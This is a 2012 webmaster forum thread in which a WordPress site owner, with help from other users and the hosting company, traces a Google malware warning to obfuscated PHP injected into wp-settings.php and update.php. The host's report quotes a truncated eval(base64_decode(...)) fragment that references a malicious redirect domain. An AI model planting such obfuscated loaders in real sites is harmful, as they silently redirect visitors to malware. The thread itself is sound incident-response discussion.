|Google detects malware, but no one else :(||csutoras||4/23/12 12:15 AM|
I have read the FAQs and checked for similar issues: Of course
My site's URL (web address) is: http://www.weirdasianews.com
So I got an email yesterday that one page on my site was potentially containing malware and was thus marked as unsafe.
I checked the page, the code for the page, and the code on the server, but found nothing questionable or problematic. I emailed the notice to my server company and also my developer and asked them to look further.
The next day I wake up to over 100 pages marked as redirecting Google to a different site that was known for offering malware. Google has now marked the entire site as unsafe (http://www.google.com/safebrowsing/diagnostic?site=http://www.weirdasianews.com/).
The warning in Webmaster Central says "Some of the URLs on this site redirect browsers to web pages that install malware. This indicates that the server(s) that host pages for this site may contain altered configuration files (such as Apache's .htaccess file)."
I posted on our Facebook page about it to let people know we were looking into it --> http://www.facebook.com/WeirdAsiaNews/posts/10150815460636051
I also emailed our server again and my developer again.
The server company, who is the same one that hosts Matt Cutt's site (http://www.mattcutts.com), has spent a lot of time looking over the server and the site, finding that nothing has been compromised or changed. My developer has come back with the same response as well.
Our ads are through Federated Media and Technorati, whom are pretty reputable and have been running our ads for years without issue, so I am not inclined to see it as an ad issue, plus the ads would not show that many times and on that many pages to Google.
As you can see from the Facebook post above, and also from our own experience and indication, no one else has experienced this issue and we have no reports at all of anyone being redirected away from the site or having any issue. Only Google seems to see this or experience this.
I am at a loss.. we have put in for a review but .. not sure how this happened and it sucks as our reputation and site are obviously taking a massive brand hit for being marked as malicious and dangerous.
|Re: Google detects malware, but no one else :(||csutoras||4/23/12 12:21 AM|
|Re: Google detects malware, but no one else :(||luzie||4/23/12 1:38 AM|
Have you looked at the code of your pages using the "Fetch-as-Googlebot"-feature in the webmastertools? It could be that only Googlebot is being served the malicious code.
Have you tried to look at your pages doing a search on Google? It could be malicious code is only presented to user agents carrying a search engine referrer.
|Re: Google detects malware, but no one else :(||csutoras||4/23/12 1:48 AM|
Yes of course. The first thing I thought is that maybe it was something meant to damage our site. Like a clever attack on us by forcing Google to put us on the Malware list. So I went and searched quite a few pages through Google and also did the Fetch-as-googlebot feature as well.
I also ran all the check tools that stopbadware.org recommends as well and every single search came up 100% clean everywhere.
|Re: Google detects malware, but no one else :(||redleg-redleg||4/23/12 3:19 AM|
Look for a file named wp-settings.php and check the content for any obfuscated php code — a line of code that starts out eval(base64_decode(’ then a long string of seemingly random characters.
|Re: Google detects malware, but no one else :(||csutoras||4/23/12 4:00 AM|
Very interesting you bring that up as just after you posted this I got a long email from my server and they fond that exact string in that same file. We have tracked the IP that made the changes and we are working on a complete restore back to the day before the first change was made, to insure that we are not missing any other backdoor changes that might allow them to come back in again.
So we are on the road to fixing this for sure.
Thanks for bring that up !!
|Re: Google detects malware, but no one else :(||redleg-redleg||4/23/12 4:23 AM|
Unfortunately this is a very widespread hack effecting a lot of WP sites currently. I have not been able to get much information other than the obfuscated php code in wp-settings.php. Would greatly appreciate any feedback on additional information you may learn in your investigation.
|Re: Google detects malware, but no one else :(||csutoras||4/23/12 4:37 AM|
This is what I got from my server.
You will note that the IP is German and that they made daily changes to the code once they got in.
Unfortunately the ability to track down all changes is just too tough, so we are just going back to a known safe time to make sure no additionally made backdoors remain.
I am friendly with quite a few well known 'security specialists' who frequently speak at places like Def-Con whom I have shared this all with, and if I hear any more from them on this I will come back and share.
We started manually investigating your site files for malicious looking code. This can be tricky if the code has been there for a while or the site is large. Luckily we have managed to find some infected code which matches the safebrowsing warning and included links to berega.in. The code was in the wp-settings.php and wp-admin/includes/update.php files. Here is an example: eval(base64_decode('Cg0KCmRlZmluZSgnV1BBX0RFQlVHJywgJzAnKTsNCgpkZWZ pbmUoJ1dQQV9WRVJTSU9OJywgJzYnKTsNCgpkZWZpbmUoJ1dQQV9TSVRFJywgJzM3OTc 5NCcpOw0KCmRlZmluZSgnV1BBX1REUycsICdiZXJlZ2EuaW4nKTsNCgpkZWZpbmUoJ1d etc... Unfortunately it's been infected for a while now which makes it very hard to figure out how this happened initially. The most recent clean backup we have is from 2012-02-02 at 10:43 AM (Pacific Time). We have restored those two files from that backup. We have managed to track the changes down to the IP address 126.96.36.199. That's been making a couple of changes to your site every day since the 24th of February. It's doing that via your homepage (i.e. the code they added to the files above probably lets them do that). We have blocked that IP address but that only offers limited protected since they can easily use another IP. It look's like they probably managed to find some sort of vulnerability in your site on the 24th which allowed them to add those files (unless there is older malicious code). We recommend restoring your whole site to the 2012-02-02 backup since there could be numerous other alterations that they have made since. You also need to change your Wordpress passwords and update all plugins and software on your site to the latest versions.
|Re: Google detects malware, but no one else :(||csutoras||4/23/12 4:38 AM|
If there is something specific that might be of help let me know and I will see what I can get you.
|Re: Google detects malware, but no one else :(||redleg-redleg||4/23/12 5:14 AM|
Thanks very much for the information. I did a short blog post about this hack on Saturday (which I have now updated to include the file
wp-admin/includes/update.php) http://redleg-redleg.blogspot.com/2012/04/malware-riotorio-com.html but had very little information to post. The big issue is How are the hackers getting access to the site. The speculation is through a vulnerability in a plugin but I have not been able to find out which one(s). Any additional info on how the hackers might have gained access (that is always tough to figure out) would be greatly appreciated.
|Re: Google detects malware, but no one else :(||csutoras||4/23/12 5:54 AM|
Here are the plugins I had on the site, some were not active:
Auto Technorati Ping
Facebook and Digg Thumbnail Generator
FD Feedburner Plugin
Google Analytics Dashboard
Google News Sitemap
Google XML Sitemap for Videos
Google XML Sitemaps
SEO Friendly Images
Tweet Old Post
Viper's Video Quicktags
WordPress Related Posts
WP Super Cache
Yet Another Related Posts Plugin
|Re: Google detects malware, but no one else :(||redleg-redleg||4/23/12 9:17 AM|
Thanks for the additional info! I am still trying to find some common plugin among the sites hit with this hack.
|Re: Google detects malware, but no one else :(||csutoras||4/23/12 5:27 PM|
I have found this all out now.
A while back I was emailed by a company who wanted to buy some ad space on the site.
This post is the same thing that I received.
Needless to say I installed the plugin and then uninstalled it a few days after, when I found out they were not real.
|Re: Google detects malware, but no one else :(||csutoras||4/23/12 5:34 PM|
|Re: Google detects malware, but no one else :(||redleg-redleg||4/23/12 7:46 PM|
Thanks again for the feedback -- Unfortunately I am just not coming up with a common entry point for this hack.